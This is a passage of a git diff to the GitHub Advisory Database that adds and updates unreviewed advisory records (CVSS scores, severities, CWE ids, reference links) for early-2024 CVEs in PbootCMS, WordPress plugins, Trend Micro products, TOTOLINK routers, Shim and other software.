b/advisories/unreviewed/2024/01/GHSA-6m95-c675-56r5/GHSA-6m95-c675-56r5.json new file mode 100644 index 0000000000000..a65add11526b8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6m95-c675-56r5/GHSA-6m95-c675-56r5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m95-c675-56r5", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-1018" + ], + "details": "A vulnerability classified as problematic has been found in PbootCMS 3.2.5-20230421. Affected is an unknown function of the file /admin.php?p=/Area/index#tab=t2. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252288.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1018" + }, + { + "type": "WEB", + "url": "https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252288" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252288" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6p59-4pch-3x39/GHSA-6p59-4pch-3x39.json b/advisories/unreviewed/2024/01/GHSA-6p59-4pch-3x39/GHSA-6p59-4pch-3x39.json new file mode 100644 index 0000000000000..b21ad3c15fa01 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6p59-4pch-3x39/GHSA-6p59-4pch-3x39.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6p59-4pch-3x39", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22293" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Andrea Tarantini BP Profile Search allows Reflected XSS.This issue affects BP Profile Search: from n/a through 5.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22293" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/bp-profile-search/wordpress-bp-profile-search-plugin-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json b/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json index a1e675d4cac8a..c13cd12ea4069 100644 --- a/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json +++ b/advisories/unreviewed/2024/01/GHSA-6pp8-37pj-mhcc/GHSA-6pp8-37pj-mhcc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6pp8-37pj-mhcc", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52325" ], "details": "A local file inclusion vulnerability in one of Trend Micro Apex Central's widgets could allow a remote attacker to execute arbitrary code on affected installations.\n\nPlease note: this vulnerability must be used in conjunction with another one to exploit an affected system. In addition, an attacker must first obtain a valid set of credentials on target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6ppv-xf37-rvx6/GHSA-6ppv-xf37-rvx6.json b/advisories/unreviewed/2024/01/GHSA-6ppv-xf37-rvx6/GHSA-6ppv-xf37-rvx6.json new file mode 100644 index 0000000000000..9c2545939a833 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6ppv-xf37-rvx6/GHSA-6ppv-xf37-rvx6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6ppv-xf37-rvx6", + "modified": "2024-01-29T09:30:24Z", + "published": "2024-01-29T09:30:24Z", + "aliases": [ + "CVE-2023-46050" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46050" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T09:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json b/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json index 36df4f6c12c76..63e16c0ec55b8 100644 --- a/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json +++ b/advisories/unreviewed/2024/01/GHSA-6px6-2jx5-44xw/GHSA-6px6-2jx5-44xw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6px6-2jx5-44xw", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0811" ], "details": "Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json b/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json index 9f56fa3572c53..5ea4b3f18a6f6 100644 --- a/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json +++ b/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6rx9-pq2q-p9rg", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48131" ], "details": "An issue in CHIGASAKI BAKERY mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:57Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json b/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json index a99a1cbe9fae4..6707d3fde14e2 100644 --- a/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json +++ b/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json b/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json index 373b6bc0ec9c9..ec46b43325211 100644 --- a/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json +++ b/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6xwv-xr2m-rj2h", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-47201" ], "details": "A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47200.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json b/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json index faad40537e8b2..97d5f947fb9c8 100644 --- a/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json +++ b/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7258-xmq8-x5x7", - "modified": "2024-01-23T03:31:07Z", + "modified": "2024-01-29T21:30:26Z", "published": "2024-01-23T03:31:07Z", "aliases": [ "CVE-2023-42915" ], "details": "Multiple issues were addressed by updating to curl version 8.4.0. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 16.7.5 and iPadOS 16.7.5. Multiple issues in curl.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json b/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json index dc65911542174..d994cce3e9012 100644 --- a/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json +++ b/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7299-g634-x782", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-22076" ], "details": "MyQ Print Server before 8.2 patch 43 allows Unauthenticated Remote Code Execution.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T11:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json b/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json index 3ae24684f3872..0a976ca99cc46 100644 --- a/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json +++ b/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json @@ -68,6 +68,10 @@ { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2024/Jan/40" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json b/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json index cf9c2a749eb6f..bb0c69aaf6aed 100644 --- a/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json +++ b/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7578-x5c2-rhcx", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-51199" ], "details": "Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json b/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json index 6fcb2677a33af..59be713bbdead 100644 --- a/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json +++ b/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json b/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json index 18efb81b022cc..447755a19c9e8 100644 --- a/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json +++ b/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json b/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json index 642935371dd69..7451b0d1d2798 100644 --- a/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json +++ b/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-78m6-vgh2-9c4v", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-41177" ], "details": "Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker.\n\nPlease note, this vulnerability is similar to, but not identical to, CVE-2023-41178.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json b/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json index dc228a6ceb73d..ee0259d383754 100644 --- a/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json +++ b/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-78p2-p949-pjvr", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-52038" ], "details": "An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_415C80 function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json b/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json index a1fba6176851e..5266fbe6c95d8 100644 --- a/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json +++ b/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-79vw-r2j5-gv89", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48135" ], "details": "An issue in mimasaka_farm mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:58Z" diff --git a/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json b/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json index 4b08096dde22d..588f8be0c87eb 100644 --- a/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json +++ b/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-79x7-r2x4-xpj2", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-41176" ], "details": "Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker.\n\nPlease note, this vulnerability is similar to, but not identical to, CVE-2023-41177.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7c4r-p7c4-2rmg/GHSA-7c4r-p7c4-2rmg.json b/advisories/unreviewed/2024/01/GHSA-7c4r-p7c4-2rmg/GHSA-7c4r-p7c4-2rmg.json new file mode 100644 index 0000000000000..e120d1bb17dd0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7c4r-p7c4-2rmg/GHSA-7c4r-p7c4-2rmg.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7c4r-p7c4-2rmg", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-1001" + ], + "details": "A vulnerability classified as critical has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected is the function main of the file /cgi-bin/cstecgi.cgi. The manipulation leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1001" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252270" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252270" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7cf2-63mg-hv4j/GHSA-7cf2-63mg-hv4j.json b/advisories/unreviewed/2024/01/GHSA-7cf2-63mg-hv4j/GHSA-7cf2-63mg-hv4j.json new file mode 100644 index 0000000000000..7692cf0ad9ba6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7cf2-63mg-hv4j/GHSA-7cf2-63mg-hv4j.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cf2-63mg-hv4j", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-40548" + ], + "details": "A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40548" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40548" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241782" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122", + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7cm4-cx64-v496/GHSA-7cm4-cx64-v496.json b/advisories/unreviewed/2024/01/GHSA-7cm4-cx64-v496/GHSA-7cm4-cx64-v496.json new file mode 100644 index 0000000000000..c841e232bacc2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7cm4-cx64-v496/GHSA-7cm4-cx64-v496.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cm4-cx64-v496", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6165" + ], + "details": "The Restrict Usernames Emails Characters WordPress plugin before 3.1.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6165" + }, + { + "type": "WEB", + "url": "https://github.com/youki992/youki992.github.io/blob/master/others/apply2.md" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/aba62286-9a82-4d5b-9b47-1fddde5da487/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7fpg-4q3m-78rq/GHSA-7fpg-4q3m-78rq.json b/advisories/unreviewed/2024/01/GHSA-7fpg-4q3m-78rq/GHSA-7fpg-4q3m-78rq.json new file mode 100644 index 0000000000000..5fc4683bde410 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7fpg-4q3m-78rq/GHSA-7fpg-4q3m-78rq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fpg-4q3m-78rq", + "modified": "2024-02-03T00:31:32Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6391" + ], + "details": "The Custom User CSS WordPress plugin through 0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6391" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-6391.txt" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/4098b18d-6ff3-462c-af05-48adb6599cf3/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7hrr-5mgf-rf3v/GHSA-7hrr-5mgf-rf3v.json b/advisories/unreviewed/2024/01/GHSA-7hrr-5mgf-rf3v/GHSA-7hrr-5mgf-rf3v.json new file mode 100644 index 0000000000000..e67406434cb93 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7hrr-5mgf-rf3v/GHSA-7hrr-5mgf-rf3v.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hrr-5mgf-rf3v", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2024-1098" + ], + "details": "A vulnerability was found in Rebuild up to 3.5.5 and classified as problematic. This issue affects the function QiniuCloud.getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to information disclosure. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252455.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1098" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252455" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/ouiw375l0m8mw5ls" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7hrx-5vq8-6933/GHSA-7hrx-5vq8-6933.json b/advisories/unreviewed/2024/01/GHSA-7hrx-5vq8-6933/GHSA-7hrx-5vq8-6933.json new file mode 100644 index 0000000000000..e293ea74d299c --- /dev/null +++ 